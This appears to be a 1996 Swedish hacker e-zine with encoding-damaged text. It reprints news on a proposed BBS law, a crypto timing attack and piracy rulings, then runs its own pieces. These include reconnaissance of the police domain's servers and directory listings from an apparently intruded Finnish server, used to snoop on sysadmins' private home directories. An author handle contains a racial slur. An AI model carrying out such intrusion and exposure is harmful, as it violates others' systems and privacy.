riskfyllt att bryta mot reglerna. Sex och politik ”r tydligen en explosiv brygd i Kina. --------------------------------------------------------------------------- 6.5 Datateknik, 960215 Slutet f–r de elektroniska klotterplanken --------------------------------------------------------------------------- Den 30 augusti 1995 h–lls i Rosenbad en hearing kring ett lagutkast om BBSer (Bulletin Board Systems). Eller elektroniska anslagstavlor som de kallas p svenska. Bland de fyrtiotal inviterade fanns folk frÂn myndigheter, organisationer, universitet och n”ringsliv, med stark kantring Ât jurister. Ocks Telia, Postnet, Sunet, TT och olika regionala n”tverkssatningar var p plats. Samt en liten grupp n”rmast s–rjande. BBSare frÂn det v”rldsomsp”nnande BBS-n”tet Fidonet, men ocks frÂn de partipolitiska anslagstavlorna f–r (s) och (m), plus nÂgra till. V”rd var enmansutredaren i IT-utredningen, Hans Jacobsson, till vardags chef f–r bankst–dsn”mnden. Vad var det d som Jacobsson satte i h”nderna p g”sterna? Jo, ett lagf–rslag som var rena d–dsst–ten f–r allt vad BBSer heter. Enligt f–rslaget ska system”garen, eller en av honom utsedd systemoperat–r, ha ansvaret f–r att BBSen inte innehÂller nÂgot brottsligt. Anv”ndare mÂste loggas och registreras f–r att vid behov kunna spÂras av polisen. Uppgifterna ska tillsammans med det vederb–rande lagt in i basen sparas under ett Ârs tid. Datainspektionen ska ha full frihet att n”r som helst kontrollera databasen och efter eget gottfinnande st”nga den. źgare och systemoperat–r mÂste ha uppnÂtt myndig Âlder! Klart att det blev protester. De lagkloka uppr–rdes lika mycket som n”tadministrat–rer och databasproducenter. Men i synnerhet f–rstÂs BBSarna sj”lva. -Det ”r helt ohÂllbart att l”gga ansvaret p systemoperat–ren, menar BBSaren Jonny Bergdahl som var med p hearingen f–r ett halvÂr sedan. -Ingen kommer att vÂga ha det jobbet. Bara genom min dator passerar 1500 inl”gg var dag. Man kan inte l”sa allt! -Och Datainspektionen fÂr i f–rslaget st–rre makt ”n polisen som ju inte kan g–ra husrannsakan utan att ha allvarliga misstankar om brott! Men alldeles uselt var nog inte f–rslaget, f–rsvarar sig IT- utredningens sekreterare Per Furberg. -Flera kom fram efterÂt och tyckte det var bra. Varken Furberg eller Jacobsson g–r dock nÂgon hemlighet av att majoriteten var starkt negativ. NÂgra exempel: Om–jligt att spara allt ett helt Âr; om–jligt att registrera och kolla upp alla som ringer in till databasen; orimligt att l”gga svÂra straffr”ttsliga bed–mningar p systemoperat–rerna. Kanske, menar utredarna idag, var kritiken till stor del sj”lvf–rvÂllad. -Vi ville ha reaktioner s vi tog i ordentligt. Det var ett provskott! Leverans enligt order Men med fyra timmars bandad kritik i bagaget var det bara f–r utredarna att efter hearingen v”nda hem till lagskrivarverkstan med svansen mellan benen. Men ”ndÂ. Lydde inte utredarna bara order och effektuerade den best”llning de fÂtt? N”r Bildtregeringen tillsatte IT- utredningen sommaren 94 var det f–r att ta udden ur de kriminella anslagstavlorna. De som gjort sig bem”rkta som forum f–r allehanda brottslig verksamhet; piratkopiering, fr”mlings- fientlig propaganda, eller som informationsk”lla f–r narkotikatillverkning, virussspridning med mera. Att BBSer ocks kan vara kanaler f–r Âsiktsutbyte omn”mndes f–rvisso i utredningsdirektiven, men bara som en kollisionsrisk mellan datalagens personregister och censurf–rbudet i etablerade massmedier. Det var tydligt att regeringen fr”mst var ute efter en snabbt hopkommen strafflag som kunde f slut p avarterna bland BBSerna. Ett syns”tt den delar med mÂnga regeringar dessa dagar. Senast dokumenterat i en EuroparÂdsrekommendation frÂn september 95, d”r medlemsl”nderna uppmanas utf”rda lagar som l”gger ansvaret p systemoperat–rerna. Och den svenske delegaten i arbetsgruppen bakom rekommendationen hette f–rstÂs: Per Furberg! BBS- kriminalitetens verkliga omfattning ”r det ingen som k”nner. Enligt RPS sysslar minst 1000 av de 4000-6000 BBSerna i landet regelm”ssigt med brott. Men ”r de verkligen s oÂtkomliga med g”llande lagar? BÂde ja och nej. En v”rml”ndsk BBS-”gare i Karlstad blev f–r en tid sedan b–tf”lld f–r att han tillÂtit barnpornografiska bilder i sin databas. Han hade inte sj”lv gjort nÂgot f–r att underl”tta trafiken, men han k”nde till den. Domen –verklagades men togs aldrig upp av hovr”tten. Ett annat omdebatterat fall ”r helsingborgaren som Âtalats f–r att ha upplÂtit sin BBS f–r spridning av piratkopior. MÂlet avg–rs i dagarna av H–gsta Domstolen, men tills dess g”ller den friande domen frÂn hovr”tten. Denna os”kerhet om lagstiftningens r”ckvidd ”r motivet till en s”rskild BBS-lag. I det prelimin”ra f–rslaget passar utredarna ocks p att g–ra bland annat barnpornografi och rasistiska uttalanden Âtalbara redan n”r de nÂr fram till en BBS, vilket de inte ”r idag. F–rslaget har blivit en blandning av den tryckfrihetsr”ttsliga modellen och vanlig strafflag. Enligt TF svarar en ansvarig utgivare ensam f–r brott som begÂs genom tryckt skrift. Enligt BBS-lagen ansvarar alla! Inte bara systemoperat–ren fÂr ta sm”llen, utan ”ven f–rfattare och andra bidragsgivare, f–r kr”nkande uttalanden, rasism, olagliga bilder och piratkopior. Fast”n uppenbarligen inspirerad av ansvarssystemet i TF och Yttrandefrihetslagen (YGL) dr”mmer IT-utredningen till med dubbelt straffansvar. Ja, mÂngdubbelt om man bet”nker att i n”t som Fidonet samma information studsar Âtskilliga gÂnger mellan ett stort antal BBSer. Alternativ finns źven diskussionsgrupper (newsgroups), och chats p Internet tr”ffas av bannbullan. Tusentals sÂdana m–ten mellanlandar dagligen p svenska universitets- och f–retagsdatorer. Blir BBS- f–rslaget lag kommer Sveriges systemoperat–rer aldrig mer att vÂga g och l”gga sig om n”tterna. De mÂste hela tiden kila upp och kolla hÂrddisken! I Australien har man skissat en modell med stegvis upptrappade sanktioner f–r dem som sprider sex och vÂld p n”tet. Men tills vidare har man stannat f–r den l”gsta ingreppsnivÂn, sj”lvsanering bland n”tadministrat–rerna. Under tiden ska det faktiska behovet av en lagrevision kartl”ggas ordentligt. I USA laborerar domstolarna redan med utgivaransvar i vissa situationer. Databas”gare som bara upplÂter plats p skivminnen eller skickar materialet vidare obearbetat (distributors) slipper ansvar. De som f–rs–ker st”da och hÂlla rent riskerar d”remot att Âka dit (publisher), vilket den v”lk”nda j”tte-BBSen Prodigy fick erfara n”r den d–mdes som ansvarig publisher f–r ”rekr”nkande inl”gg frÂn en deltagare i den –ppna, mycket popul”ra, diskussionsgruppen Money Talks. Det senaste i USA ”r den nyligen antagna, Decency Act som ”r en del i den federala telelagen. D”r bannlyses alla slags obsceniteter i ord och bild p n”tet. Framf–rallt det som riktar sig mot ungdomar under 18 Âr. Databas”gare som medvetet tillÂter sÂdan trafik straffas med dryga b–ter eller upp till 2 Ârs f”ngelse. De kan slippa ansvar om de p godtagbart s”tt f–rs–kt hindra Âtkomst f–r ungdomar. Ett alternativ som IT-utredningen fÂtt att fundera –ver kommer frÂn juristen vid Stockholms universitet Martin Brinnen. Han skriver en doktorsavhandling om telemedier och menar att utredningens f–rslag ”r on–digt detaljerat. Brinnen anser att man kan l”gga ett generellt ansvar p alla tele-och n”toperat–rer f–r det som gÂr genom deras n”t. Den som vill kan glida ur snaran genom att ha ett loggningssystem som avsl–jar avs”ndarna. Enligt Brinnen skulle det r”cka med ett litet ingrepp i telelagen, och man skulle slippa irriterande regler om censur, arkivering och tillsyn. Senast den 31 mars i Âr ska IT-utredningens slutf–rslag ligga hos regeringen. FrÂn b–rjan g”llde 1 november-95 som deadline, men efter debaclet vid hearingen beg”rde man extra tid. Utredningen har ocks ett uppdrag om elektroniska dokument s BBS-f–rslaget har legat i tr”da sedan augusti. -Men nu ska vi ta itu med den, s”ger Hans Jacobsson. T”nkte f–r smÂtt FrÂgan ”r vilken roll kritiken fÂr spela? -Jag vet inte. Men det ”r klart, n”r vi skissade vÂrt f–rslag hade jag en liten smÂskalig BBS i Nyk–pingstrakten i tankarna. Nu har jag f–rstÂtt att lagen drabbar mÂnga fler. -Som nÂgon sa: r”tt vad det ”r dimper det ned 40 Megabyte news frÂn USA. -Arkivering i ett Âr under sÂdana omst”ndigheter ”r att beg”ra f–r mycket. źven annat mÂste nog ompr–vas menar Jacobsson. SÂdant som m–jligheterna att kontrollera innehÂllet och Datainspektionens roll. -Men den som vet vad han har i databasen b–r kunna ta ett ansvar. BBS-lagen skulle ha tr”tt i kraft till sommaren om det ursprungliga schemat f–ljts. Nu blir det tidigast till Ârskiftet. Nu stÂr Âtminstone tre olika kockar och r–r i BBS-soppan. F–rutom Jacobssons utredning, ”r det utredningen om Nya Medier och en nytillsatt Datalagsutredning. Men alla ”r i otakt och har inte kunnat prata ihop sig. Ett t”nkbart scenario ”r att det kollektiva ansvar som IT- utredningen arbetar med kolliderar med ett enmansansvar av TFs modell, vilket utredningen om Nya medier kan t”nkas f–reslÂ. Och Datalagsutredningen kan snubbla p EUs persondatadirektiv vars normer f–r skydd av personuppgifter BBSer knappast lever upp till. Det kan bli en svÂr huvudv”rk f–r regeringen. En ny lag fÂr kanske snabbt bukt med problemen, men l–per  andra sidan risk att beh–va ”ndras radikalt redan efter nÂgot Âr. --------------------------------------------------------------------------- 6.6 Datateknik, 960215 Netscapes kryptering bruten p nytt-med gammal metod --------------------------------------------------------------------------- Dagens krypteringsalgoritmer ”r inte s s”kra som experterna vill lÂta g–ra g”llande. De kan inte kn”ckas med matematiska eller kryptotekniska tillv”gagÂngss”tt. D”remot kan de vara mycket sÂrbara mot okonventionella metoder. Paul Kocher, biologistuderande och inte alls nÂgon s”kerhetseller kryptoexpert, lyckades hitta en allvarlig svaghet i dagens krypteringssystem med –ppna nycklar. Han visade att tiden det tar f–r att koda och avkoda meddelanden kan avsl–ja information om viktiga delar i krypteringsalgoritmerna. MÂnga krypteringsprogram arbetar med –ppna nycklar. Den –ppna nyckeln ”r k”nd, medan varje anv”ndare har en egen privat. Nycklarna ”r vanligen mycket stora primtal. Vissa krypteringsprogram, som det i Netscape, anv”nder den privata nyckeln som en exponent. Det h–jer den privata nyckeln och ett annat primtal till potensen av den privata nyckeln, allts nyckeln upph–jt till sig sj”lvt. Paul Kocher uppt”ckte att han fick ledtrÂdar till utformningen av den privata nyckeln efter hur lÂng tid meddelanden av olika l”ngd tar att koda och avkoda. En miljard kombinationer kan vara om–jligt f–r en hacker att forcera, men om man genom Kochers teknik kan minska antalet m–jliga fall till en miljon ”r krypteringen inte l”ngre s”ker. Problemet med de olika ber”kningstiderna har l”nge varit k”nt inom forskningen p kryptering, men kryptoexperter ”r matematiker och inga s”kerhetsexperter, och kunskapen har inte tr”ngt ut. --------------------------------------------------------------------------- 6.7 Datateknik, 960215 Storebror fumlar med lagb–ckerna --------------------------------------------------------------------------- En statlig utredning f–reslÂr att den som driver en BBS mÂste vara minst 18 Âr och att han ska vara ansvarig f–r att basen inte innehÂller nÂgot brottsligt. Han ska logga anv”ndarna s att de kan spÂras av polisen och han ska spara allt som skickas in under ett Âr. Det ”r f–rstÂs ett orimligt f–rslag som, om det genomf–rs, raderar ut hela BBS-kulturen. Och d”rmed en hobby som sannolikt lockat mÂnga ungdomar att bli datatekniker. H”r mÂste lagstiftarna hitta b”ttre l–sningar. Christer ‰kerman visar p sidorna 22-25 i detta nummer av Datateknik p de problem som uppsÂtr om lagen antas. I USA har presidenten just skrivit p en ny telekommunikationslag. I lagen ingÂr en del som kallas Decency Act och som inneb”r att obsceniteter i ord och bild bannlyses p n”tet. Framf–rallt vill man stoppa det som riktar sig till ungdomar under 18 Âr. Porr fÂr endast spridas om man f–rs”krat sig om att mottagaren ”r vuxen och att denne verkligen vill se materialet. F–rslaget har fÂtt mÂnga WWW-publicister att protestera genom att l”gga en sorgsvart bakgrund p sina sidor. Denna amerikanska strid stÂr, f–renklat, mellan en tryckfrihetsfundamentalistisk falang och den inflytelserika kristna h–gern. Mer om detta p vÂra nyhetssidor. L”gg s till dessa bÂda aktuella h”ndelser debatten kring krypteringen. ‰tskilliga av v”rldens stater vill f–rhindra allt f–r kraftfull kryptering. V”rldens storebr–der vill ist”llet att vi ska anv”nda kryptering med inbyggda l–nnd–rrar f–r polisen. USA har f–rbjudit export av krypton med alltf–r lÂnga nycklar. Vad vi ser ”r en match mellan tekniken (och individuella tekniker) och staterna. Det ”r svÂrt att tro att inte staterna till slut tar hem spelet. Men det ”r ocks svÂrt att se hur de ska lyckas med det n”r teknikerna tagit fram en s decentraliserade n”tl–sning som Internet. --------------------------------------------------------------------------- 6.8 TT, 960222 HD l”t datakopierare behÂlla utrustning --------------------------------------------------------------------------- H–gsta domstolen mildrade hovr”ttens dom och lÂter en 22-Ârig Stockholmare behÂlla merparten av sin datorutrustning. I hovr”tten d–mdes mannen f–r upphovsr”ttsintrÂng. Tv datorer och sex hÂrddiskar ansÂgs vara f–rverkade. HD lÂter 22-Âringen behÂlla allt utom en hÂrddisk som r”tten anser innehÂlla upphovsr”ttsligt skyddat material som spritts via en elektronisk brevlÂda, Bulletin Board System (BBS). 22- Âringen har i sitt hem haft en databas med mycket stor kapacitet. I databasen har han haft minst 1 000 program som varit upphovsr”ttsligt skyddade. Under 1992 och 1993 gjorde mannen programmen tillg”ngliga f–r omkring 300 anv”ndare genom sin BBS. I databasen f–rekom ocks byten och kopieringar av olika program mellan anv”ndarna. I HD:s dom pÂpekar man att f–rverkande enligt upphovsr”ttslagen endast kan bli aktuell om man tror att material ska anv”ndas f–r brottslig verksamhet. HD anser att det bara ”r en av hÂrddiskarna som innehÂller det upphovsr”ttsskyddade material som 22-Âringen spritt i sin BBS. D”rf–r fÂr han nu tillbaka det andra materialet. --------------------------------------------------------------------------- 6.9 Computer Sweden, 960227 Lucka i lagen skyddar piratkopior --------------------------------------------------------------------------- Det ”r inte olagligt att ha en BBS d”r vem som helst kan h”mta hem piratkopierade program. H–gsta domstolen friade i torsdags en man som drev en sÂdan BBS, eftersom han inte sj”lv aktivt medverkat till spridningen. Medverkandeansvaret togs aldrig upp n”r en man frÂn Helsingborg stod Âtalad i h–gsta domstolen f–r brott mot upphovsr”ttslagen. Mannen drev i b–rjan av 90-talet en BBS, en elektronisk anslagstavla, d”r piratkopierade program fanns tillg”ngliga f–r vem som helst att h”mta. -Domen ”r bekymrande f–r mjukvaruindustrin. Som domen ”r formulerad s”ger den att man i princip aldrig kan utkr”va ansvar av en systemoperat–r, s”ger advokat Agne Lindberg som ”r juridiskt ombud f–r leverant–rsorganisationen Business Software Alliance. -BSA kommer att verka f–r en lagf–r”ndring. Det borde g att kr”va ansvar av den som k–per modem och l”gger upp en databas. HD konstaterar i sin dom att det finns en pÂtaglig lucka i det upphovsr”ttsliga skyddet f–r program, men domstolen ansÂg att man mÂste d–ma enligt lagens bokstav, och d ska mannen frias. -Hovr”tten kunde inte bevisa att programmen faktiskt hade kopierats. Dessutom kr”vs bevis f–r att mannen var medveten om kopieringen. D”rf–r kunde HD inte ta upp frÂgan, s”ger Nils Rekke, byrÂchef hos RiksÂklagaren. Mannen f”lldes i tingsr”tten men friades i hovr”tten. Nu har han allts friats ”ven av h–gsta domstolen. [ Se http://www.dsv.su.se/~jpalme/BBS-domen-HD-96-02-22.html f–r det fullst”ndiga domslutet ] __ _ _ ___ ___ ___ ( _| U | ) = __________________________________________________________ 7.0 ___)___)_)_\_| av htXs Den hetaste URL:en just nu mÂste vara www.takedown.com, i alla fall om man fÂr r”kna imponansv”rdet i "Kevin-on-Demand". Vi rekommenderar ett omedelbart bes–k. Om du inte skulle ha tillgÂng till en grafisk browser, g rakt p h–jdpunkten och telnet:a till kevin-on-demand.takedown.com p nÂgon port mellan 4001 och 4028. Den vedertagna uppfattningen ”r nog att 4010 ”r absolut b”st. Du beh–ver inte g–ra nÂgot aktivt f–r att njuta av f–rest”llningen, men du kan anv”nda f–ljande knappar f–r att styra hastigheten: 0-9 Move at a rate of 0-9. (0 is stopped.) > Move forward. If already moving forward, increase speed. < Move in reverse. If already in reverse, increase speed. } Single-step forward. { Single-step backward. + Increase speed by 0.5. - Decrease speed by 0.5. f,p Move forward. Reset speed to 1. F,P Move forward. Reset speed to 10. r Move in reverse. Reset speed to 1. R Move in reverse. Reset speed to 10. s Slow, then slower. / Skip. Pause. q Exit. __ __ __ ___ ___ ___ | V | ( _| __) _______________________________________________________ 8.0 |__v__|__|___)___) Rikspolisstyrelsen p Internet av Broken Pipe [NWS - Niggaz With Sniffers] Det verkar inte s”mre ”n att snuten ”mnar g–ra sin n”rvaro p Internet k”nd genom att forts”tta sitt arbete med att sprida harmoni, gl”dje och m”nnisko- k”rlek ”ven i digital form. domain: police.se org: Rikspolisstyrelsen admin-c: Patric Ostman address: Box 12256, S-102 26 Stockholm phone: +46 8-4019540 fax-no: +46 8-6507787 Dom”nen bestÂr av ett litet n”t med ett par PCs och i alla fall en HP-box. Vad RPS internetssatsning kommer att inneb”ra, och hur lÂngt de kommit ”r svÂrt att s”ga. De har en www-sida som bestÂr av meddelandet "under uppbyggnad", och deras mail-server har f–ljande att s”ga om livet: 220 mail.police.se ESMTP server (post.office v1.9.1 **** trial license expired ****) ready Dock verkar den fortfarande vara funktionsduligt. Vi fÂr verkligen hoppas att inte RPS *olagligt* nyttjar en licens som gÂtt ut! Det enda som man kan vara helt s”ker p ”r att den anonyma ftp-servern p ftp.police.se inte ”r subventionerad av ledningen inom Rikspolisstyrelsen. Eller ”r detta ett helt nytt grepp f–r att –ka polisens popul”ritet? ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 13232 drwxr-xr-x 3 root root 3072 Jul 31 1995 . drwxrwxr-x 3 root wheel 1024 Jul 31 1995 .. -rw-r--r-- 1 root root 15395 Jul 31 1995 00INDEX -rw-r--r-- 1 root root 126176 Jul 31 1995 GiaGary.gif -rw-r--r-- 1 root root 56419 Jul 31 1995 LiLi.jpg -rw-r--r-- 1 root root 25857 Jul 31 1995 NEWinona17.jpg -rw-r--r-- 1 root root 1840 Jul 31 1995 README.uploads -rw-r--r-- 1 root root 37391 Jul 31 1995 W_Ryder.jpg -rw-r--r-- 1 root root 104200 Jul 31 1995 WinRyder08.jpg -rw-r--r-- 1 root root 120206 Jul 31 1995 WinRyder09.jpg -rw-r--r-- 1 root root 8846 Jul 31 1995 WinonaAgeInn1.jpg -rw-r--r-- 1 root root 13716 Jul 31 1995 WinonaAgeInn2.jpg -rw-r--r-- 1 root root 27053 Jul 31 1995 WinonaAgeInn3.jpg -rw-r--r-- 1 root root 36359 Jul 31 1995 WinonaAndJohnny.jpg -rw-r--r-- 1 root root 39715 Jul 31 1995 WinonaBeach.jpg -rw-r--r-- 1 root root 141603 Jul 31 1995 WinonaBed.jpg -rw-r--r-- 1 root root 11776 Jul 31 1995 WinonaBigHair.jpg -rw-r--r-- 1 root root 55552 Jul 31 1995 brooke.gif -rw-r--r-- 1 root root 34144 Jul 31 1995 chlock.gif -rw-r--r-- 1 root root 490090 Jul 31 1995 death_drop.gif -rw-r--r-- 1 root root 178693 Jul 31 1995 dick_button1.gif -rw-r--r-- 1 root root 492033 Jul 31 1995 doubleAxel2.gif -rw-r--r-- 1 root root 101999 Jul 31 1995 elaine_zayak1.gif -rw-r--r-- 1 root root 76037 Jul 31 1995 elana1.jpg -rw-r--r-- 1 root root 413766 Jul 31 1995 flip.gif -rw-r--r-- 1 root root 26064 Jul 31 1995 impressionist.gif -rw-r--r-- 1 root root 61489 Jul 31 1995 janet.jpg -rw-r--r-- 1 root root 245397 Jul 31 1995 karen_bryden.jpg -rw-r--r-- 1 root root 29130 Jul 31 1995 katerina_witt1.jpg -rw-r--r-- 1 root root 81503 Jul 31 1995 katerina_witt2.gif -rw-r--r-- 1 root root 129860 Jul 31 1995 katerina_witt3.jpg -rw-r--r-- 1 root root 184112 Jul 31 1995 katerina_witt4.gif -rw-r--r-- 1 root root 90131 Jul 31 1995 katerina_witt5.gif -rw-r--r-- 1 root root 74982 Jul 31 1995 katerina_witt6.gif -rw-r--r-- 1 root root 307617 Jul 31 1995 kerrig2a.gif -rw-r--r-- 1 root root 276742 Jul 31 1995 kerrig3a.gif -rw-r--r-- 1 root root 204805 Jul 31 1995 kerrig4a.gif -rw-r--r-- 1 root root 341938 Jul 31 1995 kerrig5a.gif -rw-r--r-- 1 root root 335129 Jul 31 1995 kerrig6a.gif -rw-r--r-- 1 root root 127534 Jul 31 1995 kimbass2.gif -rw-r--r-- 1 root root 43747 Jul 31 1995 kimbass5.jpg -rw-r--r-- 1 root root 45025 Jul 31 1995 kristi_yamaguchi1.gif -rw-r--r-- 1 root root 95620 Jul 31 1995 kristi_yamaguchi2.jpg -rw-r--r-- 1 root root 18101 Jul 31 1995 kristi_yamaguchi3.jpg -rw-r--r-- 1 root root 21514 Jul 31 1995 kristi_yamaguchi4.jpg -rw-r--r-- 1 root root 185324 Jul 31 1995 lisa_ervin1.gif -rw-r--r-- 1 root root 392736 Jul 31 1995 loop.gif -rw-r--r-- 1 root root 47811 Jul 31 1995 lu_chen1.jpg -rw-r--r-- 1 root root 385173 Jul 31 1995 lutz.gif -rw-r--r-- 1 root root 70669 Jul 31 1995 mariah1.jpg -rw-r--r-- 1 root root 185063 Jul 31 1995 michelle_kwan1.gif -rw-r--r-- 1 root root 181683 Jul 31 1995 michelle_kwan2.gif -rw-r--r-- 1 root root 56616 Jul 31 1995 midori_ito1.gif -rw-r--r-- 1 root root 36392 Jul 31 1995 midori_ito2.jpg -rw-r--r-- 1 root root 68899 Jul 31 1995 nancy_kerrigan1.gif -rw-r--r-- 1 root root 100710 Jul 31 1995 nancy_kerrigan2.gif -rw-r--r-- 1 root root 29968 Jul 31 1995 nancy_kerrigan3.jpg -rw-r--r-- 1 root root 30609 Jul 31 1995 nb_camp1.gif -rw-r--r-- 1 root root 164823 Jul 31 1995 nicole_bobek1.gif -rw-r--r-- 1 root root 39173 Jul 31 1995 nk_camp1.gif -rw-r--r-- 1 root root 69377 Jul 31 1995 ob_camp1.gif -rw-r--r-- 1 root root 48874 Jul 31 1995 ob_camp2.gif -rw-r--r-- 1 root root 62745 Jul 31 1995 ob_camp3.gif -rw-r--r-- 1 root root 64580 Jul 31 1995 ob_camp4.gif -rw-r--r-- 1 root root 50959 Jul 31 1995 ob_camp5.gif -rw-r--r-- 1 root root 59502 Jul 31 1995 ob_camp6.gif -rw-r--r-- 1 root root 39870 Jul 31 1995 ob_camp7.gif -rw-r--r-- 1 root root 38377 Jul 31 1995 ob_camp8.gif -rw-r--r-- 1 root root 228147 Jul 31 1995 oksana_bayul1.gif -rw-r--r-- 1 root root 169752 Jul 31 1995 oksana_bayul2.gif -rw-r--r-- 1 root root 123132 Jul 31 1995 oksna-17.jpg -rw-r--r-- 1 root root 112161 Jul 31 1995 oksna-au.gif -rw-r--r-- 1 root root 161280 Jul 31 1995 oksna-lm.jpg -rw-r--r-- 1 root root 76255 Jul 31 1995 oksna-oi.jpg -rw-r--r-- 1 root root 62121 Jul 31 1995 oksna-st.jpg -rw-r--r-- 1 root root 81408 Jul 31 1995 pa-hwf1.jpg -rw-r--r-- 1 root root 58387 Jul 31 1995 pa-mar92.jpg -rw-r--r-- 1 root root 64982 Jul 31 1995 pa-nov93.jpg -rw-r--r-- 1 root root 102037 Jul 31 1995 pa-pca1.jpg -rw-r--r-- 1 root root 84502 Jul 31 1995 pa-pca2.jpg -rw-r--r-- 1 root root 71168 Jul 31 1995 pa-port1.jpg -rw-r--r-- 1 root root 87936 Jul 31 1995 pa-soaks.jpg -rw-r--r-- 1 root root 68096 Jul 31 1995 pa-suita.jpg -rw-r--r-- 1 root root 677512 Jul 31 1995 pamelada.gif -rw-r--r-- 1 root root 18154 Jul 31 1995 pamiller.jpg -rw-r--r-- 1 root root 160431 Jul 31 1995 pfeifer1.jpg -rw-r--r-- 1 root root 54526 Jul 31 1995 pfeiffe3.jpg drwxr-xr-x 2 root root 1024 Jul 31 1995 playmate -rw-r--r-- 1 root root 248807 Jul 31 1995 poster.gif -rw-r--r-- 1 root root 128122 Jul 31 1995 pvkergn3.gif -rw-r--r-- 1 root root 88333 Jul 31 1995 pvkergn5.gif -rw-r--r-- 1 root root 252220 Jul 31 1995 pvoksna1.gif -rw-r--r-- 1 root root 299976 Jul 31 1995 pvsktmdl.gif -rw-r--r-- 1 root root 1840 Jul 31 1995 readme.upl -rw-r--r-- 1 root root 48329 Jul 31 1995 sandra.gif -rw-r--r-- 1 root root 98223 Jul 31 1995 sandra_b.jpg -rw-r--r-- 1 root root 533573 Jul 31 1995 sit.gif -rw-r--r-- 1 root root 771 Jul 31 1995 skate_cat.gif -rw-r--r-- 1 root root 9110 Jul 31 1995 spiral1.gif -rw-r--r-- 1 root root 94769 Jul 31 1995 surya_bonaly1.gif -rw-r--r-- 1 root root 26064 Jul 31 1995 surya_bonaly2.gif -rw-r--r-- 1 root root 258337 Jul 31 1995 tanja_szewczenko.gif -rw-r--r-- 1 root root 180200 Jul 31 1995 tanja_szewczenko2.gif -rw-r--r-- 1 root root 101327 Jul 31 1995 tanja_szewczenko3.gif -rw-r--r-- 1 root root 384265 Jul 31 1995 tloop.gif -rw-r--r-- 1 root root 146359 Jul 31 1995 tonya_harding1.gif -rw-r--r-- 1 root root 17428 Jul 31 1995 topthree.jpg -rw-r--r-- 1 root root 221906 Jul 31 1995 zam.jpg 226 Transfer complete. 7618 bytes received in 1.3 seconds (5.6 Kbytes/s) ftp> cd playmate 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 332 drwxr-xr-x 2 root root 1024 Jul 31 1995 . drwxr-xr-x 3 root root 3072 Jul 31 1995 .. -rw-r--r-- 1 root root 64712 Jul 31 1995 playmate-apr95.jpg -rw-r--r-- 1 root root 18204 Jul 31 1995 playmate-aug95-b.jpeg -rw-r--r-- 1 root root 27497 Jul 31 1995 playmate-dec94.jpg -rw-r--r-- 1 root root 48368 Jul 31 1995 playmate-feb95.jpg -rw-r--r-- 1 root root 26496 Jul 31 1995 playmate-jan95.jpg -rw-r--r-- 1 root root 63759 Jul 31 1995 playmate-jun95-b.jpg -rw-r--r-- 1 root root 23042 Jul 31 1995 playmate-mar95.jpg -rw-r--r-- 1 root root 51941 Jul 31 1995 playmate-may95.jpg 226 Transfer complete. 733 bytes received in 0.097 seconds (7.4 Kbytes/s) ftp> _______________________________________________________________________________ 8.2 En sysadmins samvete av CB [ F–ljande artikel fick vi via mail frÂn ett konto som bergis inte tillh–r avs”ndaren. Texten var signerad CB, s det ”r namnet som vi s”tter ut som artikelf–rfattare. Tyv”rr k”nde vi att det vore alltf–r grymt att h”nga ut vissa personer som omn”mndes, d”rf–r ”r delar av texten raderad, och vissa namn och adresser ”r borttagna. Vi har givetvis inte haft m–jlighet att kontrollera nÂgon av uppgifterna. ] Tur ar val att det finns sys admins. Hur skulle det annars se ut? Med en massa users som hackar, tradar w4r3z, och beter sig allmant illa at.. Tja, det kan vara ngt att tanka pa.. Men forst sa kan ni kolla pa hur olika sysadmin's bar sig at.. Hehe.. Till exempel pa -----.---.fi.. Kanske mera kant som ------- --------- -- ----------. Ett utdrag ur en ls -laR / .. total 312 drwxr-xr-x 20 root root 1024 Jan 10 11:37 . drwxr-xr-x 20 root root 1024 Jan 10 11:37 .. drwxr-xr-x 10 webadmin webadmin 1024 Jan 11 17:25 WWW drwxr-xr-x 2 root bin 2048 Jan 10 10:25 bin drwxr-xr-x 2 root root 1024 Aug 28 00:36 boot drwxr-xr-x 2 root root 4096 Jan 10 10:28 dev drwxr-xr-x 9 root root 3072 Jan 12 13:09 etc drwxrwxr-x 72 root root 2048 Jan 11 17:27 home drwxr-xr-x 3 root root 1024 Aug 17 00:09 lib drwxr-sr-x 6 list list 1024 Oct 26 23:19 list drwxr-xr-x 2 root root 12288 Jul 10 1995 lost+found drwxr-xr-x 2 root root 1024 Mar 16 1994 mnt drwxrwxr-x 4 root root 1024 Nov 26 20:27 private drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 private2 ^^^^^^^^ Hmm, bara att det finns en group som heter TheDudez tyder ju pa att sysadm verkar vara lite "oserios".. dr-xr-xr-x 7 root root 0 Jan 10 12:28 proc drwx------ 14 root root 2048 Jan 12 11:14 root drwxr-xr-x 2 root bin 2048 Aug 28 01:06 sbin drwxrwxrwt 5 root root 5120 Jan 12 19:00 tmp drwxr-xr-x 20 root root 1024 Aug 22 16:55 usr drwxr-xr-x 18 root root 1024 Jul 28 14:02 var -r-------- 1 root root 273412 Sep 14 10:46 vmlinuz Tja, ska vi borja med att kolla vad som finns i /private da.. /private: total 6 drwxr-xr-x 4 root root 1024 Nov 26 20:27 . drwxr-xr-x 20 root root 1024 Jan 10 11:37 .. drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 candyman drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 pone Tva stycken, enligt vad jag kan forsta sysadmins.. Eftersom de har egna group's och ligger i /private som ar agd av root.. For att inte namna att filer i deras hem-dir ar root-agda da.. Ska bli kul att se vad de har for roligt.. /private/candyman: total 711 drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 . drwxrwxr-x 4 root root 1024 Nov 26 20:27 .. -rw-r--r-- 1 candyman nighteam 0 Jul 11 1995 .addressbook -rw-r--r-- 1 candyman nighteam 1257 Jul 11 1995 .addressbook.lu -rw-r--r-- 1 candyman nighteam 451 Jan 12 13:19 .cshrc -rw-r--r-- 1 candyman nighteam 481 Jan 10 12:35 .cshrc~ -rw-r--r-- 1 candyman nighteam 122 Jan 10 12:41 .emacs -rw-r--r-- 1 candyman nighteam 24004 Aug 18 13:25 .fvwmrc -rw-r--r-- 1 candyman nighteam 24002 Aug 18 12:49 .fvwmrc~ -rw-r--r-- 1 candyman nighteam 164 Jul 10 1995 .kermrc -rw-r--r-- 1 candyman nighteam 34 Jun 6 1993 .less -rw-r--r-- 1 candyman nighteam 114 Nov 24 1993 .lessrc -rw-r--r-- 